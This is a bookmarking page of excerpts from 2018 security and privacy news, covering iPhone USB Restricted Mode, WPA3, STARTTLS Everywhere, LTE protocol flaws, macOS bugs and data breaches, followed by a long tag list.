13 days ago by rgl7194
How Smart TVs in Millions of U.S. Homes Track More Than What’s On Tonight - The New York Times
The growing concern over online data and user privacy has been focused on tech giants like Facebook and devices like smartphones. But people’s data is also increasingly being vacuumed right out of their living rooms via their televisions, sometimes without their knowledge.
In recent years, data companies have harnessed new technology to immediately identify what people are watching on internet-connected TVs, then using that information to send targeted advertisements to other devices in their homes. Marketers, forever hungry to get their products in front of the people most likely to buy them, have eagerly embraced such practices. But the companies watching what people watch have also faced scrutiny from regulators and privacy advocates over how transparent they are being with users.
tv  privacy  security  smart_home  spying  tracking  data 
21 days ago by rgl7194
Daring Fireball: iOS Devices Can Be Blocked From Entering USB Restricted Mode
Oleg Afonin, writing for the ElcomSoft blog:
What we discovered is that iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before (well, in fact the accessories do not require pairing at all). In other words, once the police officer seizes an iPhone, he or she would need to immediately connect that iPhone to a compatible USB accessory to prevent USB Restricted Mode lock after one hour. Importantly, this only helps if the iPhone has still not entered USB Restricted Mode.
Most (if not all) USB accessories fit the purpose — for example, Lightning to USB 3 Camera Adapter from Apple.
They think this might be tricky for Apple to fix:
Can Apple change it in future versions of iOS? To us, it seems highly unlikely simply because of the humongous amount of MFi devices that aren’t designed to support such a change. Theoretically, iOS could remember which devices were connected to the iPhone, and only allow those accessories to establish connectivity without requiring an unlock — but that’s about all we can think of.
encryption  ios11  iphone  privacy  security  USB  daring_fireball 
21 days ago by rgl7194
Introducing: Malwarebytes Browser Extension - Malwarebytes Labs | Malwarebytes Labs
Are you tired of all the unwanted content the world wide web offers up, whether you like it or not? It is our privilege to introduce you to the Malwarebytes Browser Extension (BETA). Or, better said, the Malwarebytes Browser Extensions, because we have one for Firefox and one for Chrome.
Malwarebytes Browser Extension delivers a safer and faster web browsing experience. It blocks malicious websites and filters out unwanted content (resulting in up to three times faster webpage load times). The filtering is not based on definitions, so the extensions can block previously-unidentified fake tech support scams and their tactics.
What will it do for your browsing experience? It prevents pop-ups, browser hijackers, and browser lockers from harassing you and interrupting your surfing. It also blocks clickbait links and fake news content, stops in-browser cryptocurrency miners, and gives other malicious content the boot. All this while relying on threat behavior patterns rather than on researchers who have to track down, identify the malware, and add it to a database of known threats. (We still need those researchers to make our products better. This is just a different, faster method.)
Speaking of behavior patterns, our browser extension is the first that heuristically identifies and blocks tech support scams‘ browser-locker pages, which scare users into calling fake tech support scammers. So it protects you from unwanted social engineering tactics as well.
browser  plugins  chrome  firefox  security  privacy  malware 
23 days ago by rgl7194
Senator Asks US Government to Remove Flash From Federal Sites, Computers
In a letter sent today, Oregon Senator Ron Wyden asked officials from three government agencies to come up with solutions and procedures that mandate the removal of Adobe Flash content from all US government websites by August 1, 2019.
The Senator is urging US government officials to act in light of Adobe's Flash end-of-life date scheduled for the end of 2020, after which Adobe announced it would cease to provide any technical support for the software.
flash  congress  security  privacy  web2.0  gov2.0 
25 days ago by rgl7194
Defeating the iPhone Restricted Mode - Schneier on Security
Recently, Apple introduced restricted mode to protect iPhones from attacks by companies like Cellebrite and Greyshift, which allow attackers to recover information from a phone without the password or fingerprint. Elcomsoft just announced that it can easily bypass it.
There is an important lesson in this: security is hard. Apple Computer has one of the best security teams on the planet. This feature was not tossed out in a day; it was designed and implemented with a lot of thought and care. If this team could make a mistake like this, imagine how bad a security feature is when implemented by a team without this kind of expertise.
This is the reason actual cryptographers and security engineers are very skeptical when a random company announces that their product is "secure." We know that they don't have the requisite security expertise to design and implement security properly. We know they didn't take the time and care. We know that their engineers think they understand security, and designed to a level that they couldn't break.
Getting security right is hard for the best teams on the world. It's impossible for average teams.
ios11  iphone  privacy  security  USB  encryption 
27 days ago by rgl7194
USB restricted mode, plus Calisto Trojan | Mac Virus
1, Following up this story: USB restricted mode: now you don’t see it, now you do…
Elcomsoft’s claims hinged on the assertion that “…iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before…Most (if not all) USB accessories fit the purpose — for example, Lightning to USB 3 Camera Adapter from Apple.”
Andrew O’Hara, for AppleInsider, tells us that iOS 12 developer beta 4 requires device to be unlocked before connecting any USB accessories. “In the fourth developer beta of iOS 12, a passcode is required any time a computer or USB accessory is connected…Before the change, authorities or criminals would have an hour since last unlock to connect a cracking device, like the GreyKey box. Now, they don’t have that hour, making it that much more difficult to brute force a password attempt into a device.”
ios12  iphone  privacy  security  USB  encryption 
27 days ago by rgl7194
iOS 12 developer beta 4 requires device to be unlocked before connecting any USB accessories
Your iPhone's Lightning port will be even more locked down come iOS 12, which has adding an additional layer of security in the fourth developer beta.
The change in the latest beta of iOS 12 is building on USB Restricted Mode which disables the Lightning port of an iOS device one hour after last being unlocked. The Lightning port could still be used for charging, but no accessories would be able to function until unlocked.
In the fourth developer beta of iOS 12, a passcode is required any time a computer or USB accessory is connected.
Before the change, authorities or criminals would have an hour since last unlock to connect a cracking device, like the GreyKey box. Now, they don't have that hour, making it that much more difficult to brute force a password attempt into a device.
ios12  iphone  privacy  security  USB  encryption 
27 days ago by rgl7194
Daring Fireball: iOS 12 Beta 4 Requires Device to Be Unlocked Before Connecting Any USB Accessories
Andrew O’Hara, AppleInsider:
The change in the latest beta of iOS 12 is building on USB Restricted Mode which disables the Lightning port of an iOS device one hour after last being unlocked. The Lightning port could still be used for charging, but no accessories would be able to function until unlocked.
In the fourth developer beta of iOS 12, a passcode is required any time a computer or USB accessory is connected.
Before the change, authorities or criminals would have an hour since last unlock to connect a cracking device, like the GreyKey box. Now, they don’t have that hour, making it that much more difficult to brute force a password attempt into a device.
So much for this loophole being hard for Apple to close.
ios12  iphone  privacy  security  USB  encryption  daring_fireball 
27 days ago by rgl7194
Companies with data breaches in 2018 - Business Insider
At least 15 retailers were hacked and likely had information stolen from them since January 2017.
Many of these were caused by flaws in payment systems taken advantage of by hackers.
At least 15 separate security breaches occurred at retailers from January 2017 until now. Many of them were caused by flaws in payment systems, either online or in stores.
Data breaches are on the rise for both retailers and other businesses. According to Business Insider Intelligence, data breaches are a real danger for both brands and customers, and they can affect a customer's trust in brands.
According to a study by KPMG, 19% of consumers would completely stop shopping at a retailer after a breach, and 33% would take a break from shopping there for an extended period.
Here are 15 retailers that have been affected by data breaches since January 2017...
breach  data  security  privacy  store  credit_cards 
5 weeks ago by rgl7194
Apple releases iOS 11.4.1 and blocks passcode cracking tools used by police - The Verge
Apple today released iOS 11.4.1, and while most of us are already looking ahead to all the new stuff coming in iOS 12, this small update contains an important new security feature: USB Restricted Mode. Apple has added protections against the USB devices being used by law enforcement and private companies that connect over Lightning to crack an iPhone’s passcode and evade Apple’s usual encryption safeguards.
If you go to Settings and check under Face ID (or Touch ID) & Passcode, you’ll see a new toggle for USB Accessories. By default, the switch is off. This means that once your iPhone or iPad has been locked for over an hour straight, iOS will no longer allow USB accessories to connect to the device — shutting out cracking tools like GrayKey as a result. If you’ve got accessories that you want to continue working after your iPhone has been sitting locked for awhile, you can toggle the option on to remove the hour limit.
Apple’s wording is a bit confusing. You should leave the toggle disabled if you want your iPhone to be most secure.
iphone  security  privacy  ios11  USB 
5 weeks ago by rgl7194
Daring Fireball: iOS 11.4.1 Blocks USB Passcode Cracking Tools
Chris Welch, writing for The Verge:
Apple today released iOS 11.4.1, and while most of us are already looking ahead to all the new stuff coming in iOS 12, this small update contains an important new security feature: USB Restricted Mode. Apple has added protections against the USB devices being used by law enforcement and private companies that connect over Lightning to crack an iPhone’s passcode and evade Apple’s usual encryption safeguards.
Great news and an elegant solution.
iphone  security  privacy  ios11  USB  daring_fireball 
5 weeks ago by rgl7194
Apple releases iOS 11.4.1 with USB Restricted Mode | Ars Technica
The iOS update also fixes bugs with AirPods and Exchange mail servers.
As usual, this iOS release also includes security updates. However, Apple had not released the details on its security page at the time of this posting, but expect them to appear sometime soon. Significant but not listed: USB Restricted Mode, a change originally included in the iOS 12 beta that makes it more difficult for anyone, including authorities, to break into the iPhone through the Lightning port.
You'll now find a toggle switch labeled "USB Accessories" in the Touch ID & Passcode section of the Settings app labeled "USB Accessories." It's off by default. A caption explains:
Unlock iPhone to allow USB accessories to connect when it has been more than an hour since your iPhone was unlocked.
At first we thought we would have to wait until iOS 12 this fall to see this feature, but here it is.
iphone  security  privacy  ios11  USB 
5 weeks ago by rgl7194
How to use USB Restricted Mode on your iPhone or iPad
USB Restricted Mode brings a little extra security to your iPhone or iPad. Here's how you enable it.
While Apple has been testing it since the later beta versions of iOS 11.4, with the release of iOS 11.4.1, USB Restricted Mode is now available to the iPhone-using public at large. This new mode, which is buried under your passcode settings, adds additional security to your iOS device by preventing USB accessories to connect with your iPhone or iPad if the device has been locked for more than one hour.
Recently, we've seen the emergence of a number of devices, including the GrayBox, that allow third parties to gather data from your iPhone or iPad through the Lightning port without having to unlock your device beforehand. While these devices are ostensibly designed for law enforcement, they are still taking advantage of a security hole that anyone could theoretically exploit. This means that Apple has a responsibility to plug this particular hole, despite the protestations of law enforcement.
iphone  security  privacy  ios11  USB 
5 weeks ago by rgl7194
Plant Your Flag, Mark Your Territory — Krebs on Security
Many people, particularly older folks, proudly declare they avoid using the Web to manage various accounts tied to their personal and financial data — including everything from utilities and mobile phones to retirement benefits and online banking services. The reasoning behind this strategy is as simple as it is alluring: What’s not put online can’t be hacked. But increasingly, adherents to this mantra are finding out the hard way that if you don’t plant your flag online, fraudsters and identity thieves may do it for you.
The crux of the problem is that while most types of customer accounts these days can be managed online, the process of tying one’s account number to a specific email address and/or mobile device typically involves supplying personal data that can easily be found or purchased online — such as Social Security numbers, birthdays and addresses.
security  privacy  banking  krebs  taxes  mail  SSN  credit_cards  credit_freeze  seniors 
7 weeks ago by rgl7194
Dear Customer: Your Secret is(n’t) Safe with Me - Pindrop
“Secrets based” authentication based off of your customer’s static PII today alone, is useless.
With the addition of another massive data breach earlier this week of over 340M individual records of consumer and businesses with consumer profiles and preferences from a market data aggregation firm, consumer’s secrets are now fully exposed.
Identifying data like the number of children you have, their gender, dog or cat ownership smoking preference,scuba certification, as well as the typical identifying data like name, address, birth date, phone numbers, are no longer secret.
data  safety  security  privacy  business  breach  authentication 
7 weeks ago by rgl7194
Security Flaws Disclosed in LTE (4G) Mobile Telephony Standard
A team of academics has published research yesterday that describes three attacks against the mobile communication standard LTE (Long-Term Evolution), also known as 4G.
Two of the three attacks are passive, meaning an attacker can watch LTE traffic and determine various details about the target, while the third is an active attack that lets the attacker manipulate data sent to the user's LTE device.
According to researchers, the passive attacks allow an attacker to collect meta-information about the user's traffic (an identity mapping attack), while the second allows the attacker to determine what websites a user might be visiting through his LTE device (a website fingerprinting attack).
cellphones  LTE  security  privacy  hack 
7 weeks ago by rgl7194
Researchers Uncover New Attacks Against LTE Network Protocol
If your mobile carrier offers LTE, also known as the 4G network, you need to beware as your network communication can be hijacked remotely.
A team of researchers has discovered some critical weaknesses in the ubiquitous LTE mobile device standard that could allow sophisticated hackers to spy on users' cellular networks, modify the contents of their communications, and even can re-route them to malicious or phishing websites.
LTE, or Long Term Evolution, is the latest mobile telephony standard used by billions of people designed to bring many security improvements over the predecessor standard known as Global System for Mobile (GSM) communications.
However, multiple security flaws have been discovered over the past few years, allowing attackers to intercept user's communications, spy on user phone calls and text messages, send fake emergency alerts, spoof location of the device and knock devices entirely offline.
cellphones  LTE  security  privacy  hack 
7 weeks ago by rgl7194
Hackers Could Bypass macOS Signature Checks for A Decade - SecureMac
Code signing is one of the most important lines of defense against malware. It allows a user to know that the software they intend to install or run came from a trusted source, such as Apple, or another trusted developer. While code signing is not a 100% foolproof method, since some malware authors will burn legitimate developer IDs to sign their code, it’s generally a very strong safety feature. Code signed by Apple would be considered especially trustworthy, since no one would be able to spoof Apple’s private key. As it turns out, hackers have relied on this inherent trust to exploit poor security implementations in a wide-ranging number of third-party security apps.
Since the 2007 release of OS X Leopard, it seems that confusing language in Apple’s API documentation led many developers, including those of the Little Snitch Firewall, to improperly implement code signing verification. The exploit was surprisingly simple and relied on the Universal file format Apple uses to allow some applications to run on different types of Macs. By bundling together several code binaries in one package and including Apple-signed code at the top, these third-party security applications would read the entire bundle as signed by Apple.
mac  security  privacy  bug  apps  malware 
7 weeks ago by rgl7194
Bypassing Passcodes in iOS - Schneier on Security
Last week, a story was going around explaining how to brute-force an iOS password. Basically, the trick was to plug the phone into an external keyboard and trying every PIN at once:
We reported Friday on Hickey's findings, which claimed to be able to send all combinations of a user's possible passcode in one go, by enumerating each code from 0000 to 9999, and concatenating the results in one string with no spaces. He explained that because this doesn't give the software any breaks, the keyboard input routine takes priority over the device's data-erasing feature.
I didn't write about it, because it seemed too good to be true. A few days later, Apple pushed back on the findings -- and it seems that it doesn't work.
ios  passwords  security  privacy  hack 
7 weeks ago by rgl7194
EFF Launches Encryption Initiative for Email Domains Named STARTTLS Everywhere
The Electronic Frontier Foundation (EFF) announced a new project named STARTTLS Everywhere that aims to provide guidance to server administrators on how to set up a proper email server that runs STARTTLS the correct way.
STARTTLS Everywhere is eerily similar to Let's Encrypt, another pro-encryption initiative the EFF launched together with Mozilla and Cisco two years ago.
But this initiative aims to bring encrypted communications to email servers, instead of web servers (Let's Encrypt's purpose).
EFF  email  encryption  privacy  security 
7 weeks ago by rgl7194
Some Spectre In-Browser Mitigations Can Be Defeated
Some of the protections against the Spectre CPU vulnerability introduced in modern browsers can be defeated, security researchers revealed this week.
According to research published by Aleph Security on Tuesday, the company's researchers were able to put together proof-of-concept code that retrieves sensitive data from a browser's protected memory.
The browsers were running a version that received mitigations against such attacks, researchers said.
The Aleph team says their PoC bypassed Spectre mitigations and retrieved data from browsers such as Edge, Chrome, and Safari. They were not able to retrieve browser memory data from Firefox, mainly because of a different type of mitigation Mozilla had used for its browser.
browser  bug  cpu  javascript  linux  mac  meltdown_spectre  privacy  security  windows 
7 weeks ago by rgl7194
Internet Safety Month: How to manage your child's online presence - Malwarebytes Labs | Malwarebytes Labs
When you hear the term “reputation risk management,” you might think of a buzzword used in the business sector. Reputation risk management is a term used to describe how companies identify potential risks that may harm their reputation and mitigate them before they blow off.
As companies grow, so grows their public reputation. Heading potential PR disasters or credible crises off at the pass can keep organizations from losing revenue, confidence, and trust from their clients. Suffice it to say, putting your best foot forward and keeping it there is crucial.
Now, here’s a thought: If businesses know they have much to lose if their reputation is threatened, shouldn’t parents and guardians also consider that their children can lose out if their digital footprint is at risk?
To cap off Internet Safety Month, we’re going to ditch the buzzword in favor of a phrase that parents, teens, and young kids can easily grasp: You must manage your online presence. Before we delve into how parents and guardians can take charge, it is crucial that we first understand one thing when it comes to having a digital life...
internet  safety  children  security  privacy  reputation  google 
7 weeks ago by rgl7194
Equifax Engineer Who Designed Breach Website Charged With Insider Trading
The US Securities and Exchange Commission (SEC) has indicted a former Equifax engineer on charges of insider trading.
According to court documents, Sudhakar Reddy Bonthu, 44, of Cumming, Georgia, worked for Equifax between September 2003 and March 2018.
Starting September 2013, Bonthu worked as Production Development Manager of Software Engineering in Equifax's Global Consumer Solutions (GCS) business unit. Bonthu's job involved creating software for Equifax's internal use, but also for its clients.
breach  credit_report  data  equifax  gov2.0  hack  identity_theft  legal  privacy  security  crime 
7 weeks ago by rgl7194
Terrifying Spam Call Leaves Voicemail Phishing for iCloud Logins | The Mac Security Blog
Have you received a weird spam call or voicemail claiming to be from Apple support, notifying you of suspicious activity with your Apple iCloud ID? The computer-generated recording may even sound terrifying to some victims, and its goal is to snare you into giving up your iCloud ID and password as part of a new phishing campaign.
Phishing scams targeting Apple IDs and passwords are not new, ranging from text message scams to clever phishing websites, but what appears to be making headway is a new method of calling your iPhone in attempt to trick you into giving up your secret information. What's happening is you'll receive a call from a random or unknown number, such as 646-434-5603 or 844-282-0419, and if you don't pick up the scammer or hacking group will even leave a voicemail phishing for your iCloud ID and password.
security  privacy  icloud  scam  phishing  social_engineering 
7 weeks ago by rgl7194
A Technical Deep Dive into STARTTLS Everywhere | Electronic Frontier Foundation
Today we’re announcing the launch of STARTTLS Everywhere, EFF’s initiative to improve the security of the email ecosystem.
Thanks to previous EFF efforts like Let's Encrypt, and Certbot, as well as help from the major web browsers, we've seen significant wins in encrypting the web. Now we want to do for email what we’ve done for web browsing: make it simple and easy for everyone to help ensure their communications aren’t vulnerable to mass surveillance.
Note that this is a technical deep dive into EFF’s new STARTTLS Everywhere project, which assumes familiarity with SMTP and STARTTLS. If you’re not familiar with those terms, you should first read our post intended for a general audience, available here.
email  security  privacy  EFF  encryption 
7 weeks ago by rgl7194
Announcing STARTTLS Everywhere: Securing Hop-to-Hop Email Delivery | Electronic Frontier Foundation
Today we’re announcing the launch of STARTTLS Everywhere, EFF’s initiative to improve the security of the email ecosystem.
Thanks to previous EFF efforts like Let's Encrypt, and Certbot, as well as help from the major web browsers, we've seen significant wins in encrypting the web. Now we want to do for email what we’ve done for web browsing: make it simple and easy for everyone to help ensure their communications aren’t vulnerable to mass surveillance.
email  security  privacy  EFF  encryption 
7 weeks ago by rgl7194
WPA3 Standard Officially Launches With New Wi-Fi Security Features
The Wi-Fi Alliance today officially launched WPA3—the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks that are up today including the dangerous KRACK attacks.
WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended to prevent hackers from eavesdropping on your wireless data.
However, in late last year, security researchers uncovered a severe flaw in the current WPA2 protocol, dubbed KRACK (Key Reinstallation Attack), that made it possible for attackers to intercept, decrypt and even manipulate WiFi network traffic.
Although most device manufacturers patched their devices against KRACK attacks, the WiFi Alliance, without much delay, rushed to finalize and launch WPA3 in order to address WPA2's technical shortcomings from the ground.
wi-fi  security  privacy  standards 
7 weeks ago by rgl7194
New WPA3 Wi-Fi Standard Released
On Monday, the Wi-Fi Alliance, the organization that manages Wi-Fi technologies, announced the official release of WPA3.
WPA3 is the latest version of Wi-Fi Protected Access (WPA), a user authentication technology for Wi-Fi connections.
News that the Wi-Fi Alliance was working on WPA3 leaked online in January. The organization started working on WPA3 after a security researcher revealed KRACK, a vulnerability in the WPA2 WiFi protocol that made it somewhat trivial for an attacker to gain access to WiFi transmissions protected by WPA2.
WPA3 is currently optional for all newly produced devices, but it will become the de-facto Wi-Fi authentication standard for all Wi-Fi capable devices in the coming years. A date has not been set yet, but the new WPA3 will retain interoperability with older WPA2 devices to ensure as less friction as possible during the transition to WPA3.
wi-fi  security  privacy  standards 
7 weeks ago by rgl7194
WPA3 Wi-Fi security standard is officially rolling out to replace the 14-year-old WPA2 | iMore
The new standard wants to make your Wi-Fi network more secure than it's ever been.
As our mobile world progresses with new phones, smart home gadgets, and more, it's becoming even more critical that our online presence is as safe and secure as can be. To ensure things stay that way, the Wi-Fi Alliance is now certifying products that support the new WPA3 standard.
WPA3 is officially replacing WPA2, and considering that WPA2 was first released in 2004, the time for this is long overdue. Although not much is changing from a consumer point-of-view, WPA3 is chock-full of new features and tools to ensure your wireless internet connection is more secure than ever before.
One of the highlights found with WPA3 is that it makes it much more difficult for hackers to tap into your network using offline password-guessing attacks. WPA2 allows deviants to capture data from your router and then repeatedly guess your password over and over on their computer so they can gain access to your Wi-Fi setup, but with WPA3, one incorrect hacking attempt will render this data useless.
wi-fi  security  privacy  standards 
7 weeks ago by rgl7194
Ex-Senate Aide Charged in Leak Case Where Times Reporter’s Records Were Seized - The New York Times
WASHINGTON — A former Senate Intelligence Committee aide was arrested on Thursday in an investigation of classified information leaks where prosecutors also secretly seized years’ worth of a New York Times reporter’s phone and email records.
The former aide, James A. Wolfe, 57, was charged with lying repeatedly to investigators about his contacts with three reporters. According to the authorities, Mr. Wolfe made false statements to the F.B.I. about providing two of them with sensitive information related to the committee’s work. He denied to investigators that he ever gave classified material to journalists, the indictment said.
Mr. Wolfe, the Intelligence Committee’s director of security, was slated to appear before a federal judge on Friday in Washington. Reached on Thursday evening before his arrest, Mr. Wolfe declined to comment.
digital  security  privacy  encryption  signal  EFF  gov2.0  FBI  nytimes  leak 
8 weeks ago by rgl7194
Journalists and Digital Security: Some Thoughts on the NYT Leak Case | Electronic Frontier Foundation
The leak investigation involving a Senate staffer and a New York Times reporter raises significant issues about journalists, digital security, and the ability of journalists to protect confidential sources.
The New York Times recently revealed that the FBI had been investigating a former aide to the Senate Intelligence Committee, James Wolfe, for possibly leaking classified information to reporters. So far Wolfe has only been indicted for making false statements to investigators about his contacts with reporters.
The investigation appears to have been focused on how New York Times reporter Ali Watkins, when she worked for Buzzfeed News, learned that Russian spies had attempted to recruit a former advisor to President Trump, Carter Page.
Reading the New York Times article, three things jumped out at us.
digital  security  privacy  encryption  signal  EFF  gov2.0  FBI  nytimes  leak 
8 weeks ago by rgl7194
ETTV Launches Official Proxy to Fight ISP Blocking - TorrentFreak
When several torrent distribution groups started their own home at ETTV.tv, they moved into unchartered territory. In addition to distributing the latest releases, they were facing new problems, including ISP blockades. With a new proxy portal, ETTV is now responding to this week's Australian blockade, as well as similar efforts.
For several years, ETTV has been a household name in the torrent community.
The group, which distributes pirated TV-shows, originated at ExtraTorrent but when the site closed it built its own home.
Together with several like-minded uploaders, including ETHD, they launched ETTV.tv last fall. While the groups still distribute their work on other mainstream torrent indexes, the site’s traffic has been growing steadily.
tv  bittorrent  security  privacy 
8 weeks ago by rgl7194
Apple macOS Bug Reveals Cache of Sensitive Data from Encrypted Drives
Security researchers are warning of almost a decade old issue with one of the Apple's macOS feature which was designed for users' convenience but is potentially exposing the contents of files stored on password-protected encrypted drives.
Earlier this month, security researcher Wojciech Regula from SecuRing published a blog post, about the "Quick Look" feature in macOS that helps users preview photos, documents files, or a folder without opening them.
Regula explained that Quick Look feature generates thumbnails for each file/folder, giving users a convenient way to evaluate files before they open them.
mac  bug  security  privacy  encryption  preview 
8 weeks ago by rgl7194
macOS Breaks Your OpSec by Caching Data From Encrypted Hard Drives
Apple's macOS surreptitiously creates and caches thumbnails for images and other file types stored on password-protected / encrypted containers (hard drives, partitions), according to Wojciech Reguła and Patrick Wardle, two macOS security experts.
The problem is that these cached thumbnails are stored on non-encrypted hard drives, in a known location and can be easily retrieved by malware or forensics tools, revealing some of the content stored on encrypted containers.
mac  bug  security  privacy  encryption  preview 
8 weeks ago by rgl7194
Perverse Vulnerability from Interaction between 2-Factor Authentication and iOS AutoFill - Schneier on Security
Apple is rolling out an iOS security usability feature called Security code AutoFill. The basic idea is that the OS scans incoming SMS messages for security codes and suggests them in AutoFill, so that people can use them without having to memorize or type them.
Sounds like a really good idea, but Andreas Gutmann points out an application where this could become a vulnerability: when authenticating transactions...
This is an interesting interaction between two security systems. Security code AutoFill eliminates the need for the user to view the SMS or memorize the one-time code. Transaction authentication assumes the user read and approved the additional information in the SMS message before using the one-time code.
ios  security  privacy  autofill  2FA  bug 
8 weeks ago by rgl7194
« earlier      
per page:    204080120160

related tags

0day  1password  2FA  2_factor_auth  3D_printing  9to5mac  10.10  10.11  10.12  10.13  10.14  60s  70s  90s  accessibility  accessories  activism  adblock  adobe  advertising  adware  AI/ML  airdrop  air_gap  alexa  algorithm  amazon  analytics  android  anniversary  anonymity  anonymous  APFS  API  apple  appleID  appletv  apple_event  apple_pay  Apple_vs_FBI  apple_v_fbi  apps  architecture  archive  ars_technica  ashley  asia  ATM  auction  audio  australia  authentication  autofill  automatic_link  automation  award  backup  banking  baseball  bicycling  big_data  big_picture  biometric  birthday  bitcoin  bittorrent  blockchain  blogs  bluetooth  boarding_school  books  border  bot  botnet  bots  brain  breach  broadband  browser  bug  bug_bounty  bullying  business  business_model  cables  cable_tv  calendar  camera  canada  canary  cancer  career  cars  CDN  cellphones  censorship  census  charger  children  china  chip  chrome  CIA  CISA  classified  clothing  cloud  cloudbleed  cloud_computing  CNAP  code_review  collecting  college  comedy  commercials  comparo  competition  computers  conference  conflict_of_interest  congress  consulting  consumer  contacts  contest  cookies  cool_tools  copyright  corruption  cpu  credit_cards  credit_freeze  credit_monitoring  credit_report  crime  crime_drama  crowdfunding  cryptocurrency  CrySP  culture  CxO  cyber  cybercrime  cyberwar  cyrillic  daring_fireball  darknet  dark_patterns  dark_web  data  dd-wrt  DDOS  deals  death  debate  debugging  deep_web  demo  Dems  design  developer  diagnostics  diff_priv  digital  digital_rights  disaster  DMARC  DMCA  DNS  documentary  donation  download  doxing  do_not_call  do_not_disturb  do_not_track  DPD  driving  DRM  dropbox  drugs  ecommerce  economics  ecosystem  editing  education  EFF  elderly  election  electric  email  emergency  EMV  encryption  equifax  estate_planning  ethics  euromaidan  europe  evangelist  evercookie  evernote  exercise  experian  f&f  facebook  faceID  facetime  facial_recognition  factcheck  fake_news  family  faq  FBI  fcc  federighi  filename  filesharing  filevault  file_system  finances  find_my_device  fingerprint  firefox  firewall  firmware  flash  flickr  FLOTUS  flying  forensics  forum  franken  fraud  FREAK  free  freedom  FUD  gadgets  games  gates  GDPR  geek  gen_z  geotag  germany  gmail  google  google_photos  GOP  gov2.0  GPS  grammar  guide  guns  hack  handbrake  harry_potter  health  heartbleed  hermione  hijack  hillary  history  homekit  homescreen  home_stuff  howto  html5  HTTP/S  human_rights  humor  i2p  i18n  IBM  ibooks  iboot  icloud  ID  identity_theft  imac  imac_pro  infographic  infrastructure  instagram  installer  integrity  intelligence  internet  interview  ios  ios9  ios10  ios11  ios12  IoT  ipad  iphone  iphone7  iphone8  iphoneX  ipod  IPv4  IPv6  ISP  IT/IS  itunes  jailbreak  java  javascript  jobs  journal  kaspersky  keyboard  keylogging  keyraider  kickstarter  KKK  KRACK  krebs  language  last_fm  latimes  laundering  leadership  leak  legacy  legal  lets_encrypt  library  life_love_&_happiness  linkedin  linux  live_photos  lobbying  location_services  logjam  LTE  mac  macbook  macOS  macosken  macosxhints  mail  malware  mapping  maps  marketing  math  mazda  MDM  media  medical  meltdown_spectre  menubar  messaging  meta  metadata  microsoft  middle_class  middle_east  military  minecraft  MitM  mobile  money  MOOC  movies  MPU  mr_robot  music  mustang  mystery  NAS  net  netflix  networking  net_neutrality  news  new_york  notes_app  NSA  nytimes  obama  obamacare  OBD-II  OCR  off  olympics  open  open_source  OPM_breach  opt-in  opt-out  organizing  OTP  overview  p2p  pandora  parental_controls  parenting  pass  passport  passwords  patents  paypal  pdf  performance  pew  phishing  phone_number  photo  photography  photos_app  pinboard  pinterest  piracy  plex  plugins  podcast  pokémon  police  politics  porn  port_forward  POTUS  prefs  presentation  preview  printing  privacy  productivity  products  profile  programming  propaganda  protest  proxy  psychology  public  puzzles  pwn  pwn_phone  q&a  quantum  quotes  racing  racism  radio  ransomware  recommendations  record  remote  remote_login  repair  report  reputation  research  restaurants  resume  retirement  review  ridesharing  RIP  robocalls  robot  rochester  root  rootless  rootpipe  router  RSS  rumor  russia  SaaS  safari  safety  safe_harbor  sandbox  sat_phone  scam  scanning  schools  sci-fi  science  SCOTUS  scouting  screenshots  scripts  search  security  security_key  self-driving  selfie  seniors  seo  server  services  session_replay  setup  shadow_brokers  sharing  shellshock  shopping  signal  simplicity  siri  skype  slack  smartphone  smartphones  smart_home  snowden  socialnetworking  social_engineering  social_media  social_networking  social_security  society  software  sonos  soundcloud  south_america  spam  speech  spelling  sports  spotify  spying  spyware  ssd  SSN  standards  state  states  statistics  storage  store  subscription  subtitles  support  surveillance  survey  swatting  sweethome  sync  TakeCTRL  talk_show  taxes  technology  TED  teenager  telemarketing  terminal  terrorism  tesla  test  thriller  thunderbolt  tim_cook  tips  tools  top_ten  tor  touchID  touch_bar  tracking  trailer  training  transparency  travel  troubleshooting  trump  trust  tutorial  tv  tvOS  TWC  twitter  typosquatting  UI/UX  uk  ukraine  ukrainian  unicode  university  unix  unlock  update  upgrade  url  usa  USB  usenet  user_profile  USF  utilities  V2V  video  visualization  vpn  w3c  wallet  wallpaper  war  watchOS  watermark  weather  web  web-design  web-dev  web2.0  webcam  whatsapp  whistleblower  whois  wi-fi  wiki  wikileaks  windows  wirecutter  wired  wirelurker  women  workflow  WPA3  WWDC  WWII  www  XARA  xkcd  yahoo  youtube  watch 

Copy this bookmark: